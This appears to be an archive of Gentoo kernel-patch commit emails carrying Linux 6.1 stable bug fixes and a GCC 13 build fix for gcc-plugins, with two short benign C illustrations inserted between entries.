+@@ -1521,10 +1521,12 @@ static struct sdma_desc *sdma_transfer_init(struct sdma_channel *sdmac,
+ 		sdma_config_ownership(sdmac, false, true, false);
+ 
+ 	if (sdma_load_context(sdmac))
+-		goto err_desc_out;
++		goto err_bd_out;
+ 
+ 	return desc;
+ 
++err_bd_out:
++	sdma_free_bd(desc);
+ err_desc_out:
+ 	kfree(desc);
+ err_out:
+diff --git a/drivers/firmware/arm_scmi/driver.c b/drivers/firmware/arm_scmi/driver.c
+index f818d00bb2c69..ffdad59ec81fc 100644
+--- a/drivers/firmware/arm_scmi/driver.c
++++ b/drivers/firmware/arm_scmi/driver.c
+@@ -910,6 +910,8 @@ static int do_xfer(const struct scmi_protocol_handle *ph,
+ 			      xfer->hdr.protocol_id, xfer->hdr.seq,
+ 			      xfer->hdr.poll_completion);
+ 
++	/* Clear any stale status */
++	xfer->hdr.status = SCMI_SUCCESS;
+ 	xfer->state = SCMI_XFER_SENT_OK;
+ 	/*
+ 	 * Even though spinlocking is not needed here since no race is possible
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index a7d2358736fe7..fa3de3c3010ce 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -361,7 +361,7 @@ err:
+ }
+ 
+ static bool acpi_gpio_irq_is_wake(struct device *parent,
+-				  struct acpi_resource_gpio *agpio)
++				  const struct acpi_resource_gpio *agpio)
+ {
+ 	unsigned int pin = agpio->pin_table[0];
+ 
+@@ -754,7 +754,7 @@ static int acpi_populate_gpio_lookup(struct acpi_resource *ares, void *data)
+ 		lookup->info.pin_config = agpio->pin_config;
+ 		lookup->info.debounce = agpio->debounce_timeout;
+ 		lookup->info.gpioint = gpioint;
+-		lookup->info.wake_capable = agpio->wake_capable == ACPI_WAKE_CAPABLE;
++		lookup->info.wake_capable = acpi_gpio_irq_is_wake(&lookup->info.adev->dev, agpio);
+ 
+ 		/*
+ 		 * Polarity and triggering are only specified for GpioInt
+@@ -1080,7 +1080,8 @@ int acpi_dev_gpio_irq_wake_get_by(struct acpi_device *adev, const char *name, in
+ 				dev_dbg(&adev->dev, "IRQ %d already in use\n", irq);
+ 			}
+ 
+-			if (wake_capable)
++			/* avoid suspend issues with GPIOs when systems are using S3 */
++			if (wake_capable && acpi_gbl_FADT.flags & ACPI_FADT_LOW_POWER_S0)
+ 				*wake_capable = info.wake_capable;
+ 
+ 			return irq;
+@@ -1599,6 +1600,19 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_interrupt = "AMDI0030:00@18",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 1.7.8
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/1722#note_1720627
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NL5xRU"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "ELAN0415:00@9",
++		},
++	},
+ 	{} /* Terminating entry */
+ };
+ 
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index c3735848ed5db..0f8c11842a3a5 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -1294,6 +1294,7 @@
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_G540	0x0075
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_G640	0x0094
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01	0x0042
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2	0x0905
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L	0x0935
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S	0x0909
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06	0x0078
+diff --git a/drivers/hid/hid-playstation.c b/drivers/hid/hid-playstation.c
+index 0b58763bfd301..2228f6e4ba23f 100644
+--- a/drivers/hid/hid-playstation.c
++++ b/drivers/hid/hid-playstation.c
+@@ -712,6 +712,7 @@ ATTRIBUTE_GROUPS(ps_device);
+ 
+ static int dualsense_get_calibration_data(struct dualsense *ds)
+ {
++	struct hid_device *hdev = ds->base.hdev;
+ 	short gyro_pitch_bias, gyro_pitch_plus, gyro_pitch_minus;
+ 	short gyro_yaw_bias, gyro_yaw_plus, gyro_yaw_minus;
+ 	short gyro_roll_bias, gyro_roll_plus, gyro_roll_minus;
+@@ -722,6 +723,7 @@ static int dualsense_get_calibration_data(struct dualsense *ds)
+ 	int speed_2x;
+ 	int range_2g;
+ 	int ret = 0;
++	int i;
+ 	uint8_t *buf;
+ 
+ 	buf = kzalloc(DS_FEATURE_REPORT_CALIBRATION_SIZE, GFP_KERNEL);
+@@ -773,6 +775,21 @@ static int dualsense_get_calibration_data(struct dualsense *ds)
+ 	ds->gyro_calib_data[2].sens_numer = speed_2x*DS_GYRO_RES_PER_DEG_S;
+ 	ds->gyro_calib_data[2].sens_denom = gyro_roll_plus - gyro_roll_minus;
+ 
++	/*
++	 * Sanity check gyro calibration data. This is needed to prevent crashes
++	 * during report handling of virtual, clone or broken devices not implementing
++	 * calibration data properly.
++	 */
++	for (i = 0; i < ARRAY_SIZE(ds->gyro_calib_data); i++) {
++		if (ds->gyro_calib_data[i].sens_denom == 0) {
++			hid_warn(hdev, "Invalid gyro calibration data for axis (%d), disabling calibration.",
++					ds->gyro_calib_data[i].abs_code);
++			ds->gyro_calib_data[i].bias = 0;
++			ds->gyro_calib_data[i].sens_numer = DS_GYRO_RANGE;
++			ds->gyro_calib_data[i].sens_denom = S16_MAX;
++		}
++	}
++
+ 	/*
+ 	 * Set accelerometer calibration and normalization parameters.
+ 	 * Data values will be normalized to 1/DS_ACC_RES_PER_G g.
+@@ -795,6 +812,21 @@ static int dualsense_get_calibration_data(struct dualsense *ds)
+ 	ds->accel_calib_data[2].sens_numer = 2*DS_ACC_RES_PER_G;
+ 	ds->accel_calib_data[2].sens_denom = range_2g;
+ 
++	/*
++	 * Sanity check accelerometer calibration data. This is needed to prevent crashes
++	 * during report handling of virtual, clone or broken devices not implementing calibration
++	 * data properly.
++	 */
++	for (i = 0; i < ARRAY_SIZE(ds->accel_calib_data); i++) {
++		if (ds->accel_calib_data[i].sens_denom == 0) {
++			hid_warn(hdev, "Invalid accelerometer calibration data for axis (%d), disabling calibration.",
++					ds->accel_calib_data[i].abs_code);
++			ds->accel_calib_data[i].bias = 0;
++			ds->accel_calib_data[i].sens_numer = DS_ACC_RANGE;
++			ds->accel_calib_data[i].sens_denom = S16_MAX;
++		}
++	}
++
+ err_free:
+ 	kfree(buf);
+ 	return ret;
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index 7fa6fe04f1b26..cfbbc39807a69 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -525,6 +525,8 @@ static const struct hid_device_id uclogic_devices[] = {
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_G640) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index cd1233d7e2535..3c5eea3df3288 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -1655,6 +1655,8 @@ int uclogic_params_init(struct uclogic_params *params,
+ 		break;
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_PARBLO_A610_PRO):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+diff --git a/drivers/nvme/host/apple.c b/drivers/nvme/host/apple.c
+index ff8b083dc5c6d..262d2b60ac6dd 100644
+--- a/drivers/nvme/host/apple.c
++++ b/drivers/nvme/host/apple.c
+@@ -987,11 +987,11 @@ static void apple_nvme_reset_work(struct work_struct *work)
+ 		goto out;
+ 	}
+ 
+-	if (anv->ctrl.ctrl_config & NVME_CC_ENABLE)
+-		apple_nvme_disable(anv, false);
+-
+ 	/* RTKit must be shut down cleanly for the (soft)-reset to work */
+ 	if (apple_rtkit_is_running(anv->rtk)) {
++		/* reset the controller if it is enabled */
++		if (anv->ctrl.ctrl_config & NVME_CC_ENABLE)
++			apple_nvme_disable(anv, false);
+ 		dev_dbg(anv->dev, "Trying to shut down RTKit before reset.");
+ 		ret = apple_rtkit_shutdown(anv->rtk);
+ 		if (ret)
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index 4302dc75843cb..3bc1d3494be3a 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -1050,10 +1050,10 @@ int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
+ 			     const struct nls_table *cp, int remap, const char *path,
+ 			     const struct dfs_cache_tgt_iterator *it)
+ {
+-	int rc;
+-	const char *npath;
+-	struct cache_entry *ce;
+ 	struct cache_dfs_tgt *t;
++	struct cache_entry *ce;
++	const char *npath;
++	int rc = 0;
+ 
+ 	npath = dfs_cache_canonical_path(path, cp, remap);
+ 	if (IS_ERR(npath))
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 481788c24a68b..626a615dafc2f 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -577,26 +577,25 @@ static int erofs_fc_parse_param(struct fs_context *fc,
+ 		}
+ 		++ctx->devs->extra_devices;
+ 		break;
+-	case Opt_fsid:
+ #ifdef CONFIG_EROFS_FS_ONDEMAND
++	case Opt_fsid:
+ 		kfree(ctx->fsid);
+ 		ctx->fsid = kstrdup(param->string, GFP_KERNEL);
+ 		if (!ctx->fsid)
+ 			return -ENOMEM;
+-#else
+-		errorfc(fc, "fsid option not supported");
+-#endif
+ 		break;
+ 	case Opt_domain_id:
+-#ifdef CONFIG_EROFS_FS_ONDEMAND
+ 		kfree(ctx->domain_id);
+ 		ctx->domain_id = kstrdup(param->string, GFP_KERNEL);
+ 		if (!ctx->domain_id)
+ 			return -ENOMEM;
++		break;
+ #else
+-		errorfc(fc, "domain_id option not supported");
+-#endif
++	case Opt_fsid:
++	case Opt_domain_id:
++		errorfc(fc, "%s option not supported", erofs_fs_parameters[opt].name);
+ 		break;
++#endif
+ 	default:
+ 		return -ENOPARAM;
+ 	}
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index e6d5d7a18fb06..39cc014dba40c 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -793,12 +793,16 @@ static int z_erofs_iomap_begin_report(struct inode *inode, loff_t offset,
+ 		iomap->type = IOMAP_HOLE;
+ 		iomap->addr = IOMAP_NULL_ADDR;
+ 		/*
+-		 * No strict rule how to describe extents for post EOF, yet
+-		 * we need do like below. Otherwise, iomap itself will get
++		 * No strict rule on how to describe extents for post EOF, yet
++		 * we need to do like below. Otherwise, iomap itself will get
+ 		 * into an endless loop on post EOF.
++		 *
++		 * Calculate the effective offset by subtracting extent start
++		 * (map.m_la) from the requested offset, and add it to length.
++		 * (NB: offset >= map.m_la always)
+ 		 */
+ 		if (iomap->offset >= inode->i_size)
+-			iomap->length = length + map.m_la - offset;
++			iomap->length = length + offset - map.m_la;
+ 	}
+ 	iomap->flags = 0;
+ 	return 0;
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 1ed08967fb979..eb8c117cc8b6c 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -847,6 +847,9 @@ static int bpf_send_signal_common(u32 sig, enum pid_type type)
+ 		return -EPERM;
+ 	if (unlikely(!nmi_uaccess_okay()))
+ 		return -EPERM;
++	/* Task should not be pid=1 to avoid kernel panic. */
++	if (unlikely(is_global_init(current)))
++		return -EPERM;
+ 
+ 	if (irqs_disabled()) {
+ 		/* Do an early check on signal validity. Otherwise,
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 759bede0b3dd6..51db260f471f4 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4034,7 +4034,7 @@ struct sk_buff *skb_segment_list(struct sk_buff *skb,
+ 
+ 	skb_shinfo(skb)->frag_list = NULL;
+ 
+-	do {
++	while (list_skb) {
+ 		nskb = list_skb;
+ 		list_skb = list_skb->next;
+ 
+@@ -4080,8 +4080,7 @@ struct sk_buff *skb_segment_list(struct sk_buff *skb,
+ 		if (skb_needs_linearize(nskb, features) &&
+ 		    __skb_linearize(nskb))
+ 			goto err_linearize;
+-
+-	} while (list_skb);
++	}
+ 
+ 	skb->truesize = skb->truesize - delta_truesize;
+ 	skb->data_len = skb->data_len - delta_len;
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 3262ebb240926..8f0d7c666df7e 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4859,6 +4859,9 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		 */
+ 		shwt = skb_hwtstamps(rx->skb);
+ 		shwt->hwtstamp = skb_hwtstamps(skb)->hwtstamp;
++
++		/* Update the hdr pointer to the new skb for translation below */
++		hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	}
+ 
+ 	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
+diff --git a/net/mctp/af_mctp.c b/net/mctp/af_mctp.c
+index 45bbe3e54cc28..3150f3f0c8725 100644
+--- a/net/mctp/af_mctp.c
++++ b/net/mctp/af_mctp.c
+@@ -587,6 +587,11 @@ static void mctp_sk_unhash(struct sock *sk)
+ 	del_timer_sync(&msk->key_expiry);
+ }
+ 
++static void mctp_sk_destruct(struct sock *sk)
++{
++	skb_queue_purge(&sk->sk_receive_queue);
++}
++
+ static struct proto mctp_proto = {
+ 	.name		= "MCTP",
+ 	.owner		= THIS_MODULE,
+@@ -623,6 +628,7 @@ static int mctp_pf_create(struct net *net, struct socket *sock,
+ 		return -ENOMEM;
+ 
+ 	sock_init_data(sock, sk);
++	sk->sk_destruct = mctp_sk_destruct;
+ 
+ 	rc = 0;
+ 	if (sk->sk_prot->init)
+diff --git a/rust/kernel/print.rs b/rust/kernel/print.rs
+index 55db5a1ba7521..97ff086ba22e9 100644
+--- a/rust/kernel/print.rs
++++ b/rust/kernel/print.rs
+@@ -115,17 +115,24 @@ pub unsafe fn call_printk(
+ macro_rules! print_macro (
+     // The non-continuation cases (most of them, e.g. `INFO`).
+     ($format_string:path, $($arg:tt)+) => (
+-        // SAFETY: This hidden macro should only be called by the documented
+-        // printing macros which ensure the format string is one of the fixed
+-        // ones. All `__LOG_PREFIX`s are null-terminated as they are generated
+-        // by the `module!` proc macro or fixed values defined in a kernel
+-        // crate.
+-        unsafe {
+-            $crate::print::call_printk(
+-                &$format_string,
+-                crate::__LOG_PREFIX,
+-                format_args!($($arg)+),
+-            );
++        // To remain sound, `arg`s must be expanded outside the `unsafe` block.
++        // Typically one would use a `let` binding for that; however, `format_args!`
++        // takes borrows on the arguments, but does not extend the scope of temporaries.
++        // Therefore, a `match` expression is used to keep them around, since
++        // the scrutinee is kept until the end of the `match`.
++        match format_args!($($arg)+) {
++            // SAFETY: This hidden macro should only be called by the documented
++            // printing macros which ensure the format string is one of the fixed
++            // ones. All `__LOG_PREFIX`s are null-terminated as they are generated
++            // by the `module!` proc macro or fixed values defined in a kernel
++            // crate.
++            args => unsafe {
++                $crate::print::call_printk(
++                    &$format_string,
++                    crate::__LOG_PREFIX,
++                    args,
++                );
++            }
+         }
+     );
+ );
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index 291144c284fbc..f7900e75d2306 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -20,7 +20,7 @@ CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
+ 
+ ifeq ($(CROSS_COMPILE),)
+ ifeq ($(CLANG_TARGET_FLAGS),)
+-$(error Specify CROSS_COMPILE or add '--target=' option to lib.mk
++$(error Specify CROSS_COMPILE or add '--target=' option to lib.mk)
+ else
+ CLANG_FLAGS     += --target=$(CLANG_TARGET_FLAGS)
+ endif # CLANG_TARGET_FLAGS
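
The net/core/skbuff.c hunk above replaces a do/while loop with a plain while loop so that an empty frag_list is never dereferenced on the first pass. A minimal userspace sketch of the same guard, with hypothetical node/walk names standing in for sk_buff and skb_segment_list:

#include <stdio.h>

struct node {
	struct node *next;
	int val;
};

/*
 * A do { ... } while (list) loop touches the head before testing it
 * and crashes on an empty list; testing first, as the hunk above does,
 * turns the empty case into a harmless no-op.
 */
static void walk(struct node *list)
{
	while (list) {
		printf("%d\n", list->val);
		list = list->next;
	}
}

int main(void)
{
	struct node b = { .next = NULL, .val = 2 };
	struct node a = { .next = &b,   .val = 1 };

	walk(NULL);	/* empty list: no output, no crash */
	walk(&a);	/* prints 1 then 2 */
	return 0;
}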


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-02 19:02 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-02 19:02 UTC (permalink / raw
  To: gentoo-commits

commit:     e34c0cb7d58c06e7245d9f5347d5da8e817b95ce
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  2 19:01:33 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  2 19:01:33 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e34c0cb7

gcc-plugins: drop -std=gnu++11 to fix GCC 13 build

See: https://lore.kernel.org/all/20230201230009.2252783-1-sam@gentoo.org/

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...rop-std-gnu-plus-plus-to-fix-GCC-13-build.patch | 46 ++++++++++++++++++++++
 2 files changed, 50 insertions(+)

diff --git a/0000_README b/0000_README
index 0965d9a9..1f899f11 100644
--- a/0000_README
+++ b/0000_README
@@ -115,6 +115,10 @@ Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
 From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
 Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
 
+Patch:  2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
+From:   https://lore.kernel.org/all/20230201230009.2252783-1-sam@gentoo.org/
+Desc:   gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch b/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
new file mode 100644
index 00000000..55797805
--- /dev/null
+++ b/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
@@ -0,0 +1,46 @@
+From 5a6b64adc18d9adfb497a529ff004d59b6df151f Mon Sep 17 00:00:00 2001
+From: Sam James <sam@gentoo.org>
+Date: Wed, 1 Feb 2023 23:00:09 +0000
+Subject: gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
+
+The latest GCC 13 snapshot (13.0.1 20230129) gives the following:
+```
+cc1: error: cannot load plugin ./scripts/gcc-plugins/randomize_layout_plugin.so
+ :./scripts/gcc-plugins/randomize_layout_plugin.so: undefined symbol: tree_code_type
+```
+
+This ends up being because of https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=b0241ce6e37031
+upstream in GCC which changes the visibility of some types used by the kernel's
+plugin infrastructure like tree_code_type.
+
+After discussion with the GCC folks, we found that the kernel needs to be building
+plugins with the same flags used to build GCC - and GCC defaults to gnu++17
+right now. The minimum GCC version needed to build the kernel is GCC 5.1
+and GCC 5.1 already defaults to gnu++14 anyway, so just drop the flag, as
+all GCCs that could be used to build GCC already default to an acceptable
+version which was >= the version we forced via flags until now.
+
+Bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=108634
+Signed-off-by: Sam James <sam@gentoo.org>
+Signed-off-by: Kees Cook <keescook@chromium.org>
+Link: https://lore.kernel.org/r/20230201230009.2252783-1-sam@gentoo.org
+---
+ scripts/gcc-plugins/Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
+index b34d11e226366..320afd3cf8e82 100644
+--- a/scripts/gcc-plugins/Makefile
++++ b/scripts/gcc-plugins/Makefile
+@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
+ plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
+ 		  -include $(srctree)/include/linux/compiler-version.h \
+ 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
+-		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
++		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
+ 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
+ 		  -ggdb -Wno-narrowing -Wno-unused-variable \
+ 		  -Wno-format-diag
+-- 
+cgit 
+
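
The patch above rests on the claim that all gcc versions supported for building the kernel already default to an acceptable C++ dialect, so the explicit -std=gnu++11 can simply be dropped. That default can be checked by dumping the predefined __cplusplus macro; a minimal C wrapper around the usual shell one-liner (assuming a gcc binary on PATH):

#include <stdlib.h>

/*
 * Prints something like "#define __cplusplus 201703L" for a gnu++17
 * default. Equivalent to running the one-liner directly:
 *   gcc -x c++ -E -dM /dev/null | grep __cplusplus
 */
int main(void)
{
	return system("gcc -x c++ -E -dM /dev/null | grep __cplusplus");
}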


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-01  8:05 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-01  8:05 UTC (permalink / raw
  To: gentoo-commits

commit:     cabf8a4c1fb2af4bb6390d026ade7dc8133df2d5
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Feb  1 08:03:33 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Feb  1 08:03:33 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cabf8a4c

Linux patch 6.1.9

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |     4 +
 1008_linux-6.1.9.patch | 11622 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11626 insertions(+)

diff --git a/0000_README b/0000_README
index 396dd2ee..0965d9a9 100644
--- a/0000_README
+++ b/0000_README
@@ -75,6 +75,10 @@ Patch:  1007_linux-6.1.8.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.8
 
+Patch:  1008_linux-6.1.9.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.9
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1008_linux-6.1.9.patch b/1008_linux-6.1.9.patch
new file mode 100644
index 00000000..f4ffc2a3
--- /dev/null
+++ b/1008_linux-6.1.9.patch
@@ -0,0 +1,11622 @@
+diff --git a/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml b/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml
+index c46378efc1239..92e899905ef88 100644
+--- a/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml
++++ b/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml
+@@ -16,7 +16,7 @@ properties:
+   compatible:
+     items:
+       - enum:
+-          - renesas,i2c-r9a09g011  # RZ/V2M
++          - renesas,r9a09g011-i2c  # RZ/V2M
+       - const: renesas,rzv2m-i2c
+ 
+   reg:
+@@ -66,7 +66,7 @@ examples:
+     #include <dt-bindings/interrupt-controller/arm-gic.h>
+ 
+     i2c0: i2c@a4030000 {
+-        compatible = "renesas,i2c-r9a09g011", "renesas,rzv2m-i2c";
++        compatible = "renesas,r9a09g011-i2c", "renesas,rzv2m-i2c";
+         reg = <0xa4030000 0x80>;
+         interrupts = <GIC_SPI 232 IRQ_TYPE_EDGE_RISING>,
+                      <GIC_SPI 236 IRQ_TYPE_EDGE_RISING>;
+diff --git a/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml b/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml
+index 01f9d4e236e94..a7feb497eb89b 100644
+--- a/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml
++++ b/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml
+@@ -19,8 +19,8 @@ description: |
+   additional information and example.
+ 
+ patternProperties:
+-  # 25 LDOs
+-  "^LDO([1-9]|[1][0-9]|2[0-5])$":
++  # 25 LDOs, without LDO10-12
++  "^LDO([1-9]|1[3-9]|2[0-5])$":
+     type: object
+     $ref: regulator.yaml#
+     unevaluatedProperties: false
+@@ -30,6 +30,23 @@ patternProperties:
+     required:
+       - regulator-name
+ 
++  "^LDO(1[0-2])$":
++    type: object
++    $ref: regulator.yaml#
++    unevaluatedProperties: false
++    description:
++      Properties for single LDO regulator.
++
++    properties:
++      samsung,ext-control-gpios:
++        maxItems: 1
++        description:
++          LDO10, LDO11 and LDO12 can be configured to external control over
++          GPIO.
++
++    required:
++      - regulator-name
++
+   # 5 bucks
+   "^BUCK[1-5]$":
+     type: object
+diff --git a/Documentation/devicetree/bindings/riscv/cpus.yaml b/Documentation/devicetree/bindings/riscv/cpus.yaml
+index 90a7cabf58feb..d4148418350c6 100644
+--- a/Documentation/devicetree/bindings/riscv/cpus.yaml
++++ b/Documentation/devicetree/bindings/riscv/cpus.yaml
+@@ -80,7 +80,7 @@ properties:
+       insensitive, letters in the riscv,isa string must be all
+       lowercase to simplify parsing.
+     $ref: "/schemas/types.yaml#/definitions/string"
+-    pattern: ^rv(?:64|32)imaf?d?q?c?b?v?k?h?(?:_[hsxz](?:[a-z])+)*$
++    pattern: ^rv(?:64|32)imaf?d?q?c?b?k?j?p?v?h?(?:[hsxz](?:[a-z])+)?(?:_[hsxz](?:[a-z])+)*$
+ 
+   # RISC-V requires 'timebase-frequency' in /cpus, so disallow it here
+   timebase-frequency: false
+diff --git a/Documentation/devicetree/bindings/sound/everest,es8326.yaml b/Documentation/devicetree/bindings/sound/everest,es8326.yaml
+old mode 100755
+new mode 100644
+diff --git a/Documentation/x86/amd-memory-encryption.rst b/Documentation/x86/amd-memory-encryption.rst
+index a1940ebe7be50..934310ce72582 100644
+--- a/Documentation/x86/amd-memory-encryption.rst
++++ b/Documentation/x86/amd-memory-encryption.rst
+@@ -95,3 +95,39 @@ by supplying mem_encrypt=on on the kernel command line.  However, if BIOS does
+ not enable SME, then Linux will not be able to activate memory encryption, even
+ if configured to do so by default or the mem_encrypt=on command line parameter
+ is specified.
++
++Secure Nested Paging (SNP)
++==========================
++
++SEV-SNP introduces new features (SEV_FEATURES[1:63]) which can be enabled
++by the hypervisor for security enhancements. Some of these features need
++guest side implementation to function correctly. The below table lists the
++expected guest behavior with various possible scenarios of guest/hypervisor
++SNP feature support.
++
+++-----------------+---------------+---------------+------------------+
++| Feature Enabled | Guest needs   | Guest has     | Guest boot       |
++| by the HV       | implementation| implementation| behaviour        |
+++=================+===============+===============+==================+
++|      No         |      No       |      No       |     Boot         |
++|                 |               |               |                  |
+++-----------------+---------------+---------------+------------------+
++|      No         |      Yes      |      No       |     Boot         |
++|                 |               |               |                  |
+++-----------------+---------------+---------------+------------------+
++|      No         |      Yes      |      Yes      |     Boot         |
++|                 |               |               |                  |
+++-----------------+---------------+---------------+------------------+
++|      Yes        |      No       |      No       | Boot with        |
++|                 |               |               | feature enabled  |
+++-----------------+---------------+---------------+------------------+
++|      Yes        |      Yes      |      No       | Graceful boot    |
++|                 |               |               | failure          |
+++-----------------+---------------+---------------+------------------+
++|      Yes        |      Yes      |      Yes      | Boot with        |
++|                 |               |               | feature enabled  |
+++-----------------+---------------+---------------+------------------+
++
++More details in AMD64 APM[1] Vol 2: 15.34.10 SEV_STATUS MSR
++
++[1] https://www.amd.com/system/files/TechDocs/40332.pdf
+diff --git a/Makefile b/Makefile
+index 49261450039a1..3778b422fa113 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 8
++SUBLEVEL = 9
